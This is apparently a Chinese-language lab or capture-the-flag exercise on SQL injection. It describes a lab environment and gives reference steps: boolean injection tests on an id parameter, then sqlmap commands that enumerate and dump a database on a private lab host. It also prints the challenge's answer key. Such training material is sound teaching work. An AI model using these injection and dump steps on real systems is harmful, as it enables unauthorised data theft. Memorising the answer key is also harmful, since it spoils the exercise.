目录
1:题目背景
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。
2:题目描述
一个web页面列了2014年6月编程语言排行榜。我们需要通过此页面,查询到数据库里的内容,得到key。
3:答案提交
1、提交得到的key。
2、请提交操作过程报告,报告中要包含操作的关键过程描述并附截图,以WORD方式提交。
4: 提交key
key:I am sql inject
5: 关卡环境
VPC1(虚拟PC) | 工具场景:Windows XP操作系统/BT5 |
VPC2(虚拟PC) | Window server xp |
软件描述 | 使用工具场景集成的工具软件,参赛者也可以上传工具软件软件到工具场景。 |
关卡环境描述 | 1、学生机与实验室网络直连 2、VPC与实验室网络直连 3、学生机与VPC物理链路连通 |
6:参考步骤
1.打开浏览器,访问http://192.168.102.62。
2.访问超链接:
http://192.168.102.62/index.php?id=1
通过修改id的值可以查看到相应排名的语言。
3.访问:
http://192.168.102.62/index.php?id=1 and 1=1 返回正确内容。
http://192.168.102.62/index.php?id=1 and 1=2 返回错误内容。
4.通过上面可以判断存在注入。Kali下使用sqlmap获取数据库内容。
使用命令:sqlmap -u “http://192.168.102.62/index.php?id=1” --dbs 查看数据库。
使用命令:sqlmap -u “http://192.168.102.62/index.php?id=1” --dump -D “third” 获取数据库内容。得到key:I am sql inject